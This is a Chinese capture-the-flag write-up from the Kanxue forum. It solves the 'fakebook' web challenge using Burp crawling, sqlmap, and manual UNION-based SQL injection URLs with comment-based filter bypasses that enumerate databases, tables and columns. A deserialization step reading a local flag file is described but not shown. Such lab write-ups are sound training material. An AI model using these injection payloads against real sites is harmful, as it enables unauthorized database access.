查看原文
其他

攻防世界fakebook关卡攻略

xiaobaijia 看雪学院 2021-03-07

本文为看雪论坛优秀文章
看雪论坛作者ID:xiaobaijia


首先我们进入到高手进阶区获取到题目:

进来后题目场景会给我们提供一个IP地址:http://111.198.29.45:58599

下面开始进行解题。


首先通过brup对网站目录进行爬取,获取到一些有用的信息。



通过brup对网站进行爬取后,发现一个可疑路径file:///var/www/flag.php还发现了robots.txt文件。我们对robots.txt文件进行访问。


访问后发现一个可爬取的备份文件。进行访问,可以下载到源码。对代码进行审计,奈何代码0基础,先放着吧!



信息收集完毕。


进入页面首先访问的就是这个页面:




点击 join填写信息后发现我们的页面进行了跳转:



进入到下一个界面:



发现no=1可疑的url,查看是否存在SQL注入:



比较懒,通过sqlmap检测是否存在SQL注入:



通过检测可以判断存在注入点可以进行注入,由于工具sqlmap过waf不太熟练下面手工进行注入。

通过order by 判断列为4,大于4或小于均4报错,因此判断此列为4:



经测试,发现此页面对字符进行了过滤
http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata  --+



获取到数据库:
fakebook,information_schema,mysql,performance_schema,test

下面获取表:
http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"--+



表名为users。

获取字段
http://111.198.29.45:58599/view.php?no=-1 /**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"--+

 
获取字段信息,查看字段发现我们提交的数据被序列化:



猜想,是否可以在no=1注入处进行反序列化读取本地文件,反序列化语句构造:



查看源码:



获取到flag!

各位大佬不喜勿喷,小白一枚!希望能和各位大佬多多交流。



- End -




看雪ID:xiaobaijia

https://bbs.pediy.com/user-881354.htm 

*本文由看雪论坛 xiaobaijia 原创,转载请注明来自看雪社区。



推荐文章++++

CVE-2017-11882理论以及实战样本分析

恶意代码分析之 RC4 算法学习

CVE-2017-0101-Win32k提权分析笔记

ROPEmporium全解

实战栈溢出漏洞


好书推荐



公众号ID:ikanxue
官方微博:看雪安全
商务合作:wsc@kanxue.com

“阅读原文”一起来充电吧!

    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存